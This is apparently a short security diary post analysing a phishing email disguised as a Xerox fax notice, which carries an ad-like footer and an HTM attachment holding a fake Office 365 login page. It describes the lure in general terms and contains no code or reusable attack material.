Last Updated: 2022-01-18 09:10:26 UTC
by Jan Kopriva (Version: 1)
Authors of phishing and malspam messages like to use various techniques to make their creations appear as legitimate as possible in the eyes of the recipients. To this end, they often try to make their messages look like reports generated by security tools, responses to previous communication initiated by the recipient, or instructions from someone at the recipients organization, just to name a few. Most such techniques have been with us for a long time, however, last week I came across one that I don’t believe I’ve ever seen before – inclusion of what may be thought of as an advertisement in the body of the message.
Although it may sound strange, the inclusion did make at least some sort of sense. The message was supposed to look like an information about a new “fax” sent by a Xerox scanner, and its footer – which was slightly reminiscent of ads displayed by Google in search results – included links and text related to Xerox solutions.
One can only guess at whether this addition makes the message more or less believable to a regular user, but it is certainly unusual… However, it wasn’t the only slightly atypical thing about the e-mail.
As you may see in the image above, the message carried an HTM attachment. This contained an entire fake login page for Office 365 (it only loaded the O365 logo from an external site).
This technique, in which phishers include an entire fake login page in an attachment, which only initiates communication with external infrastructure when a victim attempts to click a log in button has been with us for a while now, and certainly has its advantages from the point of view of the attackers. This time, however, there was a slight twist to it.
Although – given what we just mentioned – one can hardly call the phishing attempt sophisticated, the unusual inclusion of advertisement-like content in the body of the e-mail did, at least, make it somewhat interesting... And, hopefully, the slight failure on the part of its senders made it less likely to actually make it to recipients’ inboxes and cause any harm.